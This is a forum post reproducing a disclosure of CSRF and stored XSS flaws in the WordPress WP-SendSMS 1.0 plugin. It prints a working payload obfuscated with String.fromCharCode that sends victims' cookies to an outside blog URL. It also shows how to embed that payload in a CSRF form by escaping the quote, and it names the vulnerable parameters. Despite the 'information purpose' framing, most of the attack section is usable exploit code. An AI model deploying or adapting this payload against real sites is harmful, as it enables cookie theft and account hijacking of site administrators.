Wordpress WP-SendSMS Plugin 1.0 Multiple Vulnerabilities

Als Gast hast du nur eingeschränkten Zugriff!

Anmelden

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

Antworte auf Themen oder erstelle deine eigenen.
Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.

Wordpress WP-SendSMS plugin 1.0 suffers from CSRF and Stored XSS vulnerabilities.
Interesting thing is Stored XSS + CSRF combination, because of which, attacker can exploit CSRF vulnerability to Trigger Stored XSS, for stealing Cookies!!!!

So what I have done here is , crafted simple CSRF exploit page with Stored XSS payload as below :

Challenges:

1. Stored XSS was there but was not able to execute functions like document.cookie, alert() etc.
2. Storing XSS payload inside our CSRF exploit html page.

To bypass 1st challenge I had to use function "String.fromCharCode(ascii value)" and payload will look like :

"><script>location=String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(97)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(112)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(115)+String.fromCharCode(46)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(112)+String.fromCharCode(111)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(47)+String.fromCharCode(63)+document.cookie</script>

Above payload will redirect victim to my website by attaching cookies in URL!!...

But when we put this payload inside value="XSS PAYLOAD" it will not work because it will be interpreted as value = ""><script>........ which actually sets your value="" instead of XSS payload to bypass this we can put " instead of " ... and this will be considered as valid XSS payload inside your CSRF exploit form.

For exploit please check :

Please Login HERE or Register HERE to see this link!

Stored XSS Details :

URL:

Please Login HERE or Register HERE to see this link!

Stored XSS Vulnerable Parameters:
1. sender_id
2. maximum_characters
3. captcha_width
4. captcha_height
4. captcha_characters

This is how Stored XSS can be exploited through CSRF which is effective attack, this is just for information purpose.

THX to
Please Login HERE or Register HERE to see this link!

Bearbeitet von Mr_NiceGuy, 13 June 2013 - 09:57 Uhr.

Thema	Forum	Themenstarter	Statistik	Letzter Beitrag
WordPress Vuln	Leaks	annaa	0 Antworten 165 Aufrufe	12 July 2024 - 17:21 Uhr Von: annaa
WordpressLogs V3.7	Leaks	annaa	0 Antworten 153 Aufrufe	11 July 2024 - 17:26 Uhr Von: annaa
WordpressLogs V3.7	Leaks	annaa	0 Antworten 141 Aufrufe	11 July 2024 - 17:06 Uhr Von: annaa